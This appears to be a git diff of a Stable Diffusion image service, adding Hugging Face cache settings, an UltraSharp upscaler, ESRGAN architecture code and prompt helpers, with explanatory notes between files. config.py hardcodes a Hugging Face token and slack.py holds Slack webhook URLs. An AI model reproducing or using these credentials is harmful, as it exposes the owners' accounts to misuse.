@@ -5,6 +5,7 @@ from diffusers import StableDiffusionInpaintPipeline
 
 from internals.pipelines.commons import AbstractPipeline
 from internals.util.commons import disable_safety_checker, download_image
+from internals.util.config import get_hf_cache_dir
 
 
 class InPainter(AbstractPipeline):
@@ -12,6 +13,7 @@ class InPainter(AbstractPipeline):
         self.pipe = StableDiffusionInpaintPipeline.from_pretrained(
             "jayparmr/icbinp_v8_inpaint_v2",
             torch_dtype=torch.float16,
+            cache_dir=get_hf_cache_dir(),
         ).to("cuda")
         disable_safety_checker(self.pipe)
 
@@ -31,6 +33,7 @@ class InPainter(AbstractPipeline):
         seed: int,
         prompt: Union[str, List[str]],
         negative_prompt: Union[str, List[str]],
+        steps: int = 50,
     ):
         torch.manual_seed(seed)
 
@@ -44,4 +47,5 @@ class InPainter(AbstractPipeline):
             height=height,
             width=width,
             negative_prompt=negative_prompt,
+            num_inference_steps=steps,
         ).images
internals/pipelines/replace_background.py CHANGED
@@ -17,17 +17,21 @@ from internals.pipelines.controlnets import ControlNet
 from internals.pipelines.remove_background import RemoveBackgroundV2
 from internals.pipelines.upscaler import Upscaler
 from internals.util.commons import download_image
+from internals.util.config import get_hf_cache_dir
 
 
 class ReplaceBackground(AbstractPipeline):
     def load(self, upscaler: Upscaler, remove_background: RemoveBackgroundV2):
         controlnet = ControlNetModel.from_pretrained(
-            "lllyasviel/control_v11p_sd15_lineart", torch_dtype=torch.float16
+            "lllyasviel/control_v11p_sd15_lineart",
+            torch_dtype=torch.float16,
+            cache_dir=get_hf_cache_dir(),
         ).to("cuda")
         pipe = StableDiffusionControlNetInpaintPipeline.from_pretrained(
             "runwayml/stable-diffusion-inpainting",
             controlnet=controlnet,
             torch_dtype=torch.float16,
+            cache_dir=get_hf_cache_dir(),
         )
         pipe.scheduler = UniPCMultistepScheduler.from_config(pipe.scheduler.config)
         pipe.to("cuda")
@@ -47,6 +51,7 @@ class ReplaceBackground(AbstractPipeline):
         prompt: Union[str, List[str]],
         negative_prompt: Union[str, List[str]],
         resize_dimension: int,
+        conditioning_scale: float,
         seed: int,
         steps: int,
     ):
@@ -57,6 +62,8 @@ class ReplaceBackground(AbstractPipeline):
         torch.cuda.manual_seed(seed)
 
         image = image.convert("RGB")
+        if max(image.size) > 1536:
+            image = ImageUtil.resize_image(image, dimension=1536)
         image = self.remove_background.remove(image)
 
         width = int(width)
@@ -95,6 +102,7 @@ class ReplaceBackground(AbstractPipeline):
             image=image,
             mask_image=mask,
             control_image=condition_image,
+            controlnet_conditioning_scale=conditioning_scale,
             guidance_scale=9,
             strength=1,
             height=height,
internals/pipelines/upscaler.py CHANGED
@@ -15,6 +15,7 @@ from realesrgan import RealESRGANer
 import internals.util.image as ImageUtil
 from internals.util.commons import download_image
 from internals.util.config import get_root_dir
+from models.ultrasharp.model import Ultrasharp
 
 
 class Upscaler:
@@ -23,6 +24,9 @@ class Upscaler:
     __model_gfpgan_url = (
         "https://github.com/TencentARC/GFPGAN/releases/download/v1.3.0/GFPGANv1.3.pth"
     )
+    __model_4x_ultrasharp_url = (
+        "https://comic-assets.s3.ap-south-1.amazonaws.com/models/4x-UltraSharp.pth"
+    )
 
     __loaded = False
 
@@ -40,6 +44,9 @@ class Upscaler:
         self.__model_path_gfpgan = self.__preload_model(
             self.__model_gfpgan_url, download_dir
         )
+        self.__model_path_4x_ultrasharp = self.__preload_model(
+            self.__model_4x_ultrasharp_url, download_dir
+        )
         self.__loaded = True
 
     def upscale(
@@ -129,16 +136,21 @@ class Upscaler:
         scale = max(math.floor(resize_dimension / dimension), 2)
 
         os.chdir(str(Path.home() / ".cache"))
-        upsampler = RealESRGANer(
-            scale=4,
-            model_path=model_path,
-            model=model,
-            half=False,
-            gpu_id="0",
-            tile=0,
-            tile_pad=10,
-            pre_pad=0,
-        )
+        if scale == 4:
+            print("Using 4x-Ultrasharp")
+            upsampler = Ultrasharp(self.__model_path_4x_ultrasharp)
+        else:
+            print("Using RealESRGANer")
+            upsampler = RealESRGANer(
+                scale=4,
+                model_path=model_path,
+                model=model,
+                half=False,
+                gpu_id="0",
+                tile=0,
+                tile_pad=10,
+                pre_pad=0,
+            )
        face_enhancer = GFPGANer(
            model_path=self.__model_path_gfpgan,
            upscale=scale,
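
Note: scale is computed just above as max(math.floor(resize_dimension / dimension), 2), so the new Ultrasharp branch fires only when that works out to exactly 4; 2x, 3x and greater-than-4x jobs still go through RealESRGANer. Worked examples:

    import math

    def pick(dimension, resize_dimension):
        scale = max(math.floor(resize_dimension / dimension), 2)
        return ("Ultrasharp" if scale == 4 else "RealESRGANer"), scale

    print(pick(512, 2048))  # ('Ultrasharp', 4)
    print(pick(512, 1024))  # ('RealESRGANer', 2)
    print(pick(512, 4096))  # ('RealESRGANer', 8)
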
internals/util/avatar.py CHANGED
@@ -15,6 +15,8 @@ class Avatar:
         print("Local characters", self.__avatars)
 
     def fetch_from_network(self, model_id: int):
+        if not model_id:
+            return
         characters = getCharacters(str(model_id))
         if characters is not None:
             for character in characters:
internals/util/config.py CHANGED
@@ -1,17 +1,32 @@
 import os
+from pathlib import Path
+from typing import Union
 
 from internals.data.task import Task
 
-env = "gamma"
+env = "prod"
 nsfw_threshold = 0.0
 nsfw_access = False
 access_token = ""
 root_dir = ""
 model_dir = ""
 hf_token = "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"
+hf_cache_dir = "/tmp/hf_hub"
 
 num_return_sequences = 4  # the number of results to generate
 
+os.makedirs(hf_cache_dir, exist_ok=True)
+
+
+def set_hf_cache_dir(dir: Union[str, Path]):
+    global hf_cache_dir
+    hf_cache_dir = str(dir)
+
+
+def get_hf_cache_dir():
+    global hf_cache_dir
+    return hf_cache_dir
+
 
 def set_model_dir(dir: str):
     global model_dir
@@ -26,10 +41,10 @@
 def set_configs_from_task(task: Task):
     global env, nsfw_threshold, nsfw_access, access_token
     name = task.get_queue_name()
-    if name.startswith("prod"):
-        env = "prod"
-    else:
+    if name.startswith("gamma"):
         env = "gamma"
+    else:
+        env = "prod"
     nsfw_threshold = task.get_nsfw_threshold()
     nsfw_access = task.can_access_nsfw()
     access_token = task.get_access_token()
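
Note: these helpers centralize the Hugging Face cache location. handler.py now points it at ~/.cache/hf_cache before any model loads, and the from_pretrained calls throughout the pipelines pass cache_dir=get_hf_cache_dir(). Minimal usage, mirroring handler.py:

    from pathlib import Path

    from internals.util.config import get_hf_cache_dir, set_hf_cache_dir

    set_hf_cache_dir(Path.home() / ".cache" / "hf_cache")
    print(get_hf_cache_dir())  # e.g. /home/user/.cache/hf_cache
    # later, inside a pipeline:
    # ControlNetModel.from_pretrained(model_id, cache_dir=get_hf_cache_dir())
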
internals/util/prompt.py ADDED
@@ -0,0 +1,132 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
+from typing import List, Optional
+
+from internals.data.task import Task
+from internals.pipelines.commons import Text2Img
+from internals.pipelines.img_classifier import ImageClassifier
+from internals.pipelines.img_to_text import Image2Text
+from internals.pipelines.prompt_modifier import PromptModifier
+from internals.util.anomaly import remove_colors
+from internals.util.avatar import Avatar
+from internals.util.config import num_return_sequences
+from internals.util.lora_style import LoraStyle
+
+
+def get_patched_prompt(
+    task: Task,
+    avatar: Avatar,
+    lora_style: LoraStyle,
+    prompt_modifier: PromptModifier,
+):
+    def add_style_and_character(prompt: List[str], additional: Optional[str] = None):
+        for i in range(len(prompt)):
+            prompt[i] = avatar.add_code_names(prompt[i])
+            prompt[i] = lora_style.prepend_style_to_prompt(prompt[i], task.get_style())
+            if additional:
+                prompt[i] = additional + " " + prompt[i]
+
+    prompt = task.get_prompt()
+
+    if task.is_prompt_engineering():
+        prompt = prompt_modifier.modify(prompt)
+    else:
+        prompt = [prompt] * num_return_sequences
+
+    ori_prompt = [task.get_prompt()] * num_return_sequences
+
+    class_name = None
+    add_style_and_character(ori_prompt, class_name)
+    add_style_and_character(prompt, class_name)
+
+    print({"prompts": prompt})
+
+    return (prompt, ori_prompt)
+
+
+def get_patched_prompt_text2img(
+    task: Task,
+    avatar: Avatar,
+    lora_style: LoraStyle,
+    prompt_modifier: PromptModifier,
+) -> Text2Img.Params:
+    def add_style_and_character(prompt: str, prepend: str = ""):
+        prompt = avatar.add_code_names(prompt)
+        prompt = lora_style.prepend_style_to_prompt(prompt, task.get_style())
+        prompt = prepend + prompt
+        return prompt
+
+    if task.get_prompt_left() and task.get_prompt_right():
+        # prepend = "2characters, "
+        prepend = ""
+        if task.is_prompt_engineering():
+            mod_prompt = prompt_modifier.modify(task.get_prompt())
+        else:
+            mod_prompt = [task.get_prompt()] * num_return_sequences
+
+        prompt, prompt_left, prompt_right = [], [], []
+        for i in range(len(mod_prompt)):
+            mp = mod_prompt[i].replace(task.get_prompt(), "")
+            prompt.append(add_style_and_character(task.get_prompt(), prepend) + mp)
+            prompt_left.append(
+                add_style_and_character(task.get_prompt_left(), prepend) + mp
+            )
+            prompt_right.append(
+                add_style_and_character(task.get_prompt_right(), prepend) + mp
+            )
+
+        params = Text2Img.Params(
+            prompt=prompt,
+            prompt_left=prompt_left,
+            prompt_right=prompt_right,
+        )
+    else:
+        if task.is_prompt_engineering():
+            mod_prompt = prompt_modifier.modify(task.get_prompt())
+        else:
+            mod_prompt = [task.get_prompt()] * num_return_sequences
+        mod_prompt = [add_style_and_character(mp) for mp in mod_prompt]
+
+        params = Text2Img.Params(
+            prompt=[add_style_and_character(task.get_prompt())] * num_return_sequences,
+            modified_prompt=mod_prompt,
+        )
+
+    print(params)
+
+    return params
+
+
+def get_patched_prompt_tile_upscale(
+    task: Task,
+    avatar: Avatar,
+    lora_style: LoraStyle,
+    img_classifier: ImageClassifier,
+    img2text: Image2Text,
+):
+    if task.get_prompt():
+        prompt = task.get_prompt()
+    else:
+        prompt = img2text.process(task.get_imageUrl())
+
+    # merge blip
+    if task.PROMPT.has_placeholder_blip_merge():
+        blip = img2text.process(task.get_imageUrl())
+        prompt = task.PROMPT.merge_blip(blip)
+
+    # remove anomalies in prompt
+    prompt = remove_colors(prompt)
+
+    prompt = avatar.add_code_names(prompt)
+    prompt = lora_style.prepend_style_to_prompt(prompt, task.get_style())
+
+    if not task.get_style():
+        class_name = img_classifier.classify(
+            task.get_imageUrl(), task.get_width(), task.get_height()
+        )
+    else:
+        class_name = ""
+    prompt = class_name + " " + prompt
+    prompt = prompt.strip()
+
+    print({"prompt": prompt})
+
+    return prompt
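
For orientation, a minimal sketch of a call site for the refactored helpers above — the `task` and pipeline objects are assumed to be constructed elsewhere at service start-up, and none of this sketch is part of the commit itself:

# Hypothetical wiring only: the helpers now receive their collaborators
# explicitly instead of reading module-level singletons.
prompt, ori_prompt = get_patched_prompt(task, avatar, lora_style, prompt_modifier)
params = get_patched_prompt_text2img(task, avatar, lora_style, prompt_modifier)
tile_prompt = get_patched_prompt_tile_upscale(
    task, avatar, lora_style, img_classifier, img2text
)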
internals/util/slack.py CHANGED
@@ -11,7 +11,7 @@ class Slack:
     def __init__(self):
         # self.webhook_url = "https://hooks.slack.com/services/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"
         self.webhook_url = "https://hooks.slack.com/services/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"
-        self.error_webhook = "https://hooks.slack.com/services/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"
+        self.error_webhook = "https://hooks.slack.com/services/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"
 
     def send_alert(self, task: Task, args: Optional[dict]):
         raw = task.get_raw().copy()
models/ultrasharp/arch.py ADDED
@@ -0,0 +1,756 @@
+# this file is adapted from https://github.com/victorca25/iNNfer
+
+import math
+from collections import OrderedDict
+
+import torch
+import torch.nn as nn
+import torch.nn.functional as F
+
+####################
+# RRDBNet Generator
+####################
+
+
+class RRDBNet(nn.Module):
+    def __init__(
+        self,
+        in_nc,
+        out_nc,
+        nf,
+        nb,
+        nr=3,
+        gc=32,
+        upscale=4,
+        norm_type=None,
+        act_type="leakyrelu",
+        mode="CNA",
+        upsample_mode="upconv",
+        convtype="Conv2D",
+        finalact=None,
+        gaussian_noise=False,
+        plus=False,
+    ):
+        super(RRDBNet, self).__init__()
+        n_upscale = int(math.log(upscale, 2))
+        if upscale == 3:
+            n_upscale = 1
+
+        self.resrgan_scale = 0
+        if in_nc % 16 == 0:
+            self.resrgan_scale = 1
+        elif in_nc != 4 and in_nc % 4 == 0:
+            self.resrgan_scale = 2
+
+        fea_conv = conv_block(
+            in_nc, nf, kernel_size=3, norm_type=None, act_type=None, convtype=convtype
+        )
+        rb_blocks = [
+            RRDB(
+                nf,
+                nr,
+                kernel_size=3,
+                gc=32,
+                stride=1,
+                bias=1,
+                pad_type="zero",
+                norm_type=norm_type,
+                act_type=act_type,
+                mode="CNA",
+                convtype=convtype,
+                gaussian_noise=gaussian_noise,
+                plus=plus,
+            )
+            for _ in range(nb)
+        ]
+        LR_conv = conv_block(
+            nf,
+            nf,
+            kernel_size=3,
+            norm_type=norm_type,
+            act_type=None,
+            mode=mode,
+            convtype=convtype,
+        )
+
+        if upsample_mode == "upconv":
+            upsample_block = upconv_block
+        elif upsample_mode == "pixelshuffle":
+            upsample_block = pixelshuffle_block
+        else:
+            raise NotImplementedError(f"upsample mode [{upsample_mode}] is not found")
+        if upscale == 3:
+            upsampler = upsample_block(nf, nf, 3, act_type=act_type, convtype=convtype)
+        else:
+            upsampler = [
+                upsample_block(nf, nf, act_type=act_type, convtype=convtype)
+                for _ in range(n_upscale)
+            ]
+        HR_conv0 = conv_block(
+            nf, nf, kernel_size=3, norm_type=None, act_type=act_type, convtype=convtype
+        )
+        HR_conv1 = conv_block(
+            nf, out_nc, kernel_size=3, norm_type=None, act_type=None, convtype=convtype
+        )
+
+        outact = act(finalact) if finalact else None
+
+        self.model = sequential(
+            fea_conv,
+            ShortcutBlock(sequential(*rb_blocks, LR_conv)),
+            *upsampler,
+            HR_conv0,
+            HR_conv1,
+            outact,
+        )
+
+    def forward(self, x, outm=None):
+        if self.resrgan_scale == 1:
+            feat = pixel_unshuffle(x, scale=4)
+        elif self.resrgan_scale == 2:
+            feat = pixel_unshuffle(x, scale=2)
+        else:
+            feat = x
+
+        return self.model(feat)
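
As a quick sanity check on the class above, a sketch (not part of the commit) that instantiates the usual ESRGAN x4 configuration; nf=64 and nb=23 are the common defaults, assumed here for illustration:

# Illustrative only: a standard 4x ESRGAN-style generator on a dummy input.
net = RRDBNet(in_nc=3, out_nc=3, nf=64, nb=23, upscale=4)
with torch.no_grad():
    out = net(torch.randn(1, 3, 32, 32))  # shape: (1, 3, 128, 128)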
+
+
+class RRDB(nn.Module):
+    """
+    Residual in Residual Dense Block
+    (ESRGAN: Enhanced Super-Resolution Generative Adversarial Networks)
+    """
+
+    def __init__(
+        self,
+        nf,
+        nr=3,
+        kernel_size=3,
+        gc=32,
+        stride=1,
+        bias=1,
+        pad_type="zero",
+        norm_type=None,
+        act_type="leakyrelu",
+        mode="CNA",
+        convtype="Conv2D",
+        spectral_norm=False,
+        gaussian_noise=False,
+        plus=False,
+    ):
+        super(RRDB, self).__init__()
+        # This is for backwards compatibility with existing models
+        if nr == 3:
+            self.RDB1 = ResidualDenseBlock_5C(
+                nf,
+                kernel_size,
+                gc,
+                stride,
+                bias,
+                pad_type,
+                norm_type,
+                act_type,
+                mode,
+                convtype,
+                spectral_norm=spectral_norm,
+                gaussian_noise=gaussian_noise,
+                plus=plus,
+            )
+            self.RDB2 = ResidualDenseBlock_5C(
+                nf,
+                kernel_size,
+                gc,
+                stride,
+                bias,
+                pad_type,
+                norm_type,
+                act_type,
+                mode,
+                convtype,
+                spectral_norm=spectral_norm,
+                gaussian_noise=gaussian_noise,
+                plus=plus,
+            )
+            self.RDB3 = ResidualDenseBlock_5C(
+                nf,
+                kernel_size,
+                gc,
+                stride,
+                bias,
+                pad_type,
+                norm_type,
+                act_type,
+                mode,
+                convtype,
+                spectral_norm=spectral_norm,
+                gaussian_noise=gaussian_noise,
+                plus=plus,
+            )
+        else:
+            RDB_list = [
+                ResidualDenseBlock_5C(
+                    nf,
+                    kernel_size,
+                    gc,
+                    stride,
+                    bias,
+                    pad_type,
+                    norm_type,
+                    act_type,
+                    mode,
+                    convtype,
+                    spectral_norm=spectral_norm,
+                    gaussian_noise=gaussian_noise,
+                    plus=plus,
+                )
+                for _ in range(nr)
+            ]
+            self.RDBs = nn.Sequential(*RDB_list)
+
+    def forward(self, x):
+        if hasattr(self, "RDB1"):
+            out = self.RDB1(x)
+            out = self.RDB2(out)
+            out = self.RDB3(out)
+        else:
+            out = self.RDBs(x)
+        return out * 0.2 + x
+
+
+class ResidualDenseBlock_5C(nn.Module):
+    """
+    Residual Dense Block
+    The core module of paper: (Residual Dense Network for Image Super-Resolution, CVPR 18)
+    Modified options that can be used:
+    - "Partial Convolution based Padding" arXiv:1811.11718
+    - "Spectral normalization" arXiv:1802.05957
+    - "ICASSP 2020 - ESRGAN+ : Further Improving ESRGAN" N. C.
+      {Rakotonirina} and A. {Rasoanaivo}
+    """
+
+    def __init__(
+        self,
+        nf=64,
+        kernel_size=3,
+        gc=32,
+        stride=1,
+        bias=1,
+        pad_type="zero",
+        norm_type=None,
+        act_type="leakyrelu",
+        mode="CNA",
+        convtype="Conv2D",
+        spectral_norm=False,
+        gaussian_noise=False,
+        plus=False,
+    ):
+        super(ResidualDenseBlock_5C, self).__init__()
+
+        self.noise = GaussianNoise() if gaussian_noise else None
+        self.conv1x1 = conv1x1(nf, gc) if plus else None
+
+        self.conv1 = conv_block(
+            nf,
+            gc,
+            kernel_size,
+            stride,
+            bias=bias,
+            pad_type=pad_type,
+            norm_type=norm_type,
+            act_type=act_type,
+            mode=mode,
+            convtype=convtype,
+            spectral_norm=spectral_norm,
+        )
+        self.conv2 = conv_block(
+            nf + gc,
+            gc,
+            kernel_size,
+            stride,
+            bias=bias,
+            pad_type=pad_type,
+            norm_type=norm_type,
+            act_type=act_type,
+            mode=mode,
+            convtype=convtype,
+            spectral_norm=spectral_norm,
+        )
+        self.conv3 = conv_block(
+            nf + 2 * gc,
+            gc,
+            kernel_size,
+            stride,
+            bias=bias,
+            pad_type=pad_type,
+            norm_type=norm_type,
+            act_type=act_type,
+            mode=mode,
+            convtype=convtype,
+            spectral_norm=spectral_norm,
+        )
+        self.conv4 = conv_block(
+            nf + 3 * gc,
+            gc,
+            kernel_size,
+            stride,
+            bias=bias,
+            pad_type=pad_type,
+            norm_type=norm_type,
+            act_type=act_type,
+            mode=mode,
+            convtype=convtype,
+            spectral_norm=spectral_norm,
+        )
+        if mode == "CNA":
+            last_act = None
+        else:
+            last_act = act_type
+        self.conv5 = conv_block(
+            nf + 4 * gc,
+            nf,
+            3,
+            stride,
+            bias=bias,
+            pad_type=pad_type,
+            norm_type=norm_type,
+            act_type=last_act,
+            mode=mode,
+            convtype=convtype,
+            spectral_norm=spectral_norm,
+        )
+
+    def forward(self, x):
+        x1 = self.conv1(x)
+        x2 = self.conv2(torch.cat((x, x1), 1))
+        if self.conv1x1:
+            x2 = x2 + self.conv1x1(x)
+        x3 = self.conv3(torch.cat((x, x1, x2), 1))
+        x4 = self.conv4(torch.cat((x, x1, x2, x3), 1))
+        if self.conv1x1:
+            x4 = x4 + x2
+        x5 = self.conv5(torch.cat((x, x1, x2, x3, x4), 1))
+        if self.noise:
+            return self.noise(x5.mul(0.2) + x)
+        else:
+            return x5 * 0.2 + x
+
+
+####################
+# ESRGANplus
+####################
+
+
+class GaussianNoise(nn.Module):
+    def __init__(self, sigma=0.1, is_relative_detach=False):
+        super().__init__()
+        self.sigma = sigma
+        self.is_relative_detach = is_relative_detach
+        self.noise = torch.tensor(0, dtype=torch.float)
+
+    def forward(self, x):
+        if self.training and self.sigma != 0:
+            self.noise = self.noise.to(x.device)
+            scale = (
+                self.sigma * x.detach() if self.is_relative_detach else self.sigma * x
+            )
+            sampled_noise = self.noise.repeat(*x.size()).normal_() * scale
+            x = x + sampled_noise
+        return x
+
+
+def conv1x1(in_planes, out_planes, stride=1):
+    return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)
+
+
+####################
+# SRVGGNetCompact
+####################
+
+
+class SRVGGNetCompact(nn.Module):
+    """A compact VGG-style network structure for super-resolution.
+    This class is copied from https://github.com/xinntao/Real-ESRGAN
+    """
+
+    def __init__(
+        self,
+        num_in_ch=3,
+        num_out_ch=3,
+        num_feat=64,
+        num_conv=16,
+        upscale=4,
+        act_type="prelu",
+    ):
+        super(SRVGGNetCompact, self).__init__()
+        self.num_in_ch = num_in_ch
+        self.num_out_ch = num_out_ch
+        self.num_feat = num_feat
+        self.num_conv = num_conv
+        self.upscale = upscale
+        self.act_type = act_type
+
+        self.body = nn.ModuleList()
+        # the first conv
+        self.body.append(nn.Conv2d(num_in_ch, num_feat, 3, 1, 1))
+        # the first activation
+        if act_type == "relu":
+            activation = nn.ReLU(inplace=True)
+        elif act_type == "prelu":
+            activation = nn.PReLU(num_parameters=num_feat)
+        elif act_type == "leakyrelu":
+            activation = nn.LeakyReLU(negative_slope=0.1, inplace=True)
+        self.body.append(activation)
+
+        # the body structure
+        for _ in range(num_conv):
+            self.body.append(nn.Conv2d(num_feat, num_feat, 3, 1, 1))
+            # activation
+            if act_type == "relu":
+                activation = nn.ReLU(inplace=True)
+            elif act_type == "prelu":
+                activation = nn.PReLU(num_parameters=num_feat)
+            elif act_type == "leakyrelu":
+                activation = nn.LeakyReLU(negative_slope=0.1, inplace=True)
+            self.body.append(activation)
+
+        # the last conv
+        self.body.append(nn.Conv2d(num_feat, num_out_ch * upscale * upscale, 3, 1, 1))
+        # upsample
+        self.upsampler = nn.PixelShuffle(upscale)
+
+    def forward(self, x):
+        out = x
+        for i in range(0, len(self.body)):
+            out = self.body[i](out)
+
+        out = self.upsampler(out)
+        # add the nearest upsampled image, so that the network learns the residual
+        base = F.interpolate(x, scale_factor=self.upscale, mode="nearest")
+        out += base
+        return out
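
For contrast with RRDBNet, a brief sketch (illustrative, not in the commit) showing that the compact net stays at input resolution until the single trailing PixelShuffle:

# Illustrative only: feature maps stay at 32x32 until PixelShuffle(4),
# and the nearest-neighbour residual keeps the low frequencies intact.
net = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, upscale=4)
with torch.no_grad():
    out = net(torch.randn(1, 3, 32, 32))  # shape: (1, 3, 128, 128)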
+
+
+####################
+# Upsampler
+####################
+
+
+class Upsample(nn.Module):
+    r"""Upsamples a given multi-channel 1D (temporal), 2D (spatial) or 3D (volumetric) data.
+    The input data is assumed to be of the form
+    `minibatch x channels x [optional depth] x [optional height] x width`.
+    """
+
+    def __init__(
+        self, size=None, scale_factor=None, mode="nearest", align_corners=None
+    ):
+        super(Upsample, self).__init__()
+        if isinstance(scale_factor, tuple):
+            self.scale_factor = tuple(float(factor) for factor in scale_factor)
+        else:
+            self.scale_factor = float(scale_factor) if scale_factor else None
+        self.mode = mode
+        self.size = size
+        self.align_corners = align_corners
+
+    def forward(self, x):
+        return nn.functional.interpolate(
+            x,
+            size=self.size,
+            scale_factor=self.scale_factor,
+            mode=self.mode,
+            align_corners=self.align_corners,
+        )
+
+    def extra_repr(self):
+        if self.scale_factor is not None:
+            info = f"scale_factor={self.scale_factor}"
+        else:
+            info = f"size={self.size}"
+        info += f", mode={self.mode}"
+        return info
+
+
+def pixel_unshuffle(x, scale):
+    """Pixel unshuffle.
+    Args:
+        x (Tensor): Input feature with shape (b, c, hh, hw).
+        scale (int): Downsample ratio.
+    Returns:
+        Tensor: the pixel unshuffled feature.
+    """
+    b, c, hh, hw = x.size()
+    out_channel = c * (scale**2)
+    assert hh % scale == 0 and hw % scale == 0
+    h = hh // scale
+    w = hw // scale
+    x_view = x.view(b, c, h, scale, w, scale)
+    return x_view.permute(0, 1, 3, 5, 2, 4).reshape(b, out_channel, h, w)
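
A shape example for pixel_unshuffle (illustrative): it trades spatial resolution for channels, which is how the resrgan_scale branches in RRDBNet.forward feed models whose weights expect unshuffled input:

# Illustrative only: 3 channels at 64x64 become 3 * 4**2 = 48 channels at 16x16.
feat = pixel_unshuffle(torch.randn(1, 3, 64, 64), scale=4)
print(feat.shape)  # torch.Size([1, 48, 16, 16])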
+
+
+def pixelshuffle_block(
+    in_nc,
+    out_nc,
+    upscale_factor=2,
+    kernel_size=3,
+    stride=1,
+    bias=True,
+    pad_type="zero",
+    norm_type=None,
+    act_type="relu",
+    convtype="Conv2D",
+):
+    """
+    Pixel shuffle layer
+    (Real-Time Single Image and Video Super-Resolution Using an Efficient Sub-Pixel Convolutional
+    Neural Network, CVPR17)
+    """
+    conv = conv_block(
+        in_nc,
+        out_nc * (upscale_factor**2),
+        kernel_size,
+        stride,
+        bias=bias,
+        pad_type=pad_type,
+        norm_type=None,
+        act_type=None,
+        convtype=convtype,
+    )
+    pixel_shuffle = nn.PixelShuffle(upscale_factor)
+
+    n = norm(norm_type, out_nc) if norm_type else None
+    a = act(act_type) if act_type else None
+    return sequential(conv, pixel_shuffle, n, a)
+
+
+def upconv_block(
+    in_nc,
+    out_nc,
+    upscale_factor=2,
+    kernel_size=3,
+    stride=1,
+    bias=True,
+    pad_type="zero",
+    norm_type=None,
+    act_type="relu",
+    mode="nearest",
+    convtype="Conv2D",
+):
+    """Upconv layer"""
+    upscale_factor = (
+        (1, upscale_factor, upscale_factor) if convtype == "Conv3D" else upscale_factor
+    )
+    upsample = Upsample(scale_factor=upscale_factor, mode=mode)
+    conv = conv_block(
+        in_nc,
+        out_nc,
+        kernel_size,
+        stride,
+        bias=bias,
+        pad_type=pad_type,
+        norm_type=norm_type,
+        act_type=act_type,
+        convtype=convtype,
+    )
+    return sequential(upsample, conv)
+
+
+####################
+# Basic blocks
+####################
+
+
+def make_layer(basic_block, num_basic_block, **kwarg):
+    """Make layers by stacking the same blocks.
+    Args:
+        basic_block (nn.module): nn.module class for basic block. (block)
+        num_basic_block (int): number of blocks. (n_layers)
+    Returns:
+        nn.Sequential: Stacked blocks in nn.Sequential.
+    """
+    layers = []
+    for _ in range(num_basic_block):
+        layers.append(basic_block(**kwarg))
+    return nn.Sequential(*layers)
+
+
+def act(act_type, inplace=True, neg_slope=0.2, n_prelu=1, beta=1.0):
+    """activation helper"""
+    act_type = act_type.lower()
+    if act_type == "relu":
+        layer = nn.ReLU(inplace)
+    elif act_type in ("leakyrelu", "lrelu"):
+        layer = nn.LeakyReLU(neg_slope, inplace)
+    elif act_type == "prelu":
+        layer = nn.PReLU(num_parameters=n_prelu, init=neg_slope)
+    elif act_type == "tanh":  # [-1, 1] range output
+        layer = nn.Tanh()
+    elif act_type == "sigmoid":  # [0, 1] range output
+        layer = nn.Sigmoid()
+    else:
+        raise NotImplementedError(f"activation layer [{act_type}] is not found")
+    return layer
+
+
+class Identity(nn.Module):
+    def __init__(self, *kwargs):
+        super(Identity, self).__init__()
+
+    def forward(self, x, *kwargs):
+        return x
+
+
+def norm(norm_type, nc):
+    """Return a normalization layer"""
+    norm_type = norm_type.lower()
+    if norm_type == "batch":
+        layer = nn.BatchNorm2d(nc, affine=True)
+    elif norm_type == "instance":
+        layer = nn.InstanceNorm2d(nc, affine=False)
+    elif norm_type == "none":
+        # note: this branch previously defined an unused inner function and left
+        # `layer` unbound, raising UnboundLocalError; return an identity module
+        layer = Identity()
+    else:
+        raise NotImplementedError(f"normalization layer [{norm_type}] is not found")
+    return layer
+
+
+def pad(pad_type, padding):
+    """padding layer helper"""
+    pad_type = pad_type.lower()
+    if padding == 0:
+        return None
+    if pad_type == "reflect":
+        layer = nn.ReflectionPad2d(padding)
+    elif pad_type == "replicate":
+        layer = nn.ReplicationPad2d(padding)
+    elif pad_type == "zero":
+        layer = nn.ZeroPad2d(padding)
+    else:
+        raise NotImplementedError(f"padding layer [{pad_type}] is not implemented")
+    return layer
+
+
+def get_valid_padding(kernel_size, dilation):
+    kernel_size = kernel_size + (kernel_size - 1) * (dilation - 1)
+    padding = (kernel_size - 1) // 2
+    return padding
+
+
+class ShortcutBlock(nn.Module):
+    """Elementwise sum the output of a submodule to its input"""
+
+    def __init__(self, submodule):
+        super(ShortcutBlock, self).__init__()
+        self.sub = submodule
+
+    def forward(self, x):
+        output = x + self.sub(x)
+        return output
+
+    def __repr__(self):
+        return "Identity + \n|" + self.sub.__repr__().replace("\n", "\n|")
+
+
+def sequential(*args):
+    """Flatten Sequential. It unwraps nn.Sequential."""
+    if len(args) == 1:
+        if isinstance(args[0], OrderedDict):
+            raise NotImplementedError("sequential does not support OrderedDict input.")
+        return args[0]  # No sequential is needed.
+    modules = []
+    for module in args:
+        if isinstance(module, nn.Sequential):
+            for submodule in module.children():
+                modules.append(submodule)
+        elif isinstance(module, nn.Module):
+            modules.append(module)
+    return nn.Sequential(*modules)
+
+
+def conv_block(
+    in_nc,
+    out_nc,
+    kernel_size,
+    stride=1,
+    dilation=1,
+    groups=1,
+    bias=True,
+    pad_type="zero",
+    norm_type=None,
+    act_type="relu",
+    mode="CNA",
+    convtype="Conv2D",
+    spectral_norm=False,
+):
+    """Conv layer with padding, normalization, activation"""
+    assert mode in ["CNA", "NAC", "CNAC"], f"Wrong conv mode [{mode}]"
+    padding = get_valid_padding(kernel_size, dilation)
+    p = pad(pad_type, padding) if pad_type and pad_type != "zero" else None
+    padding = padding if pad_type == "zero" else 0
+
+    if convtype == "PartialConv2D":
+        from torchvision.ops import (
+            PartialConv2d,
+        )  # this is definitely not going to work, but PartialConv2d doesn't work anyway and this shuts up static analyzer
+
+        c = PartialConv2d(
+            in_nc,
+            out_nc,
+            kernel_size=kernel_size,
+            stride=stride,
+            padding=padding,
+            dilation=dilation,
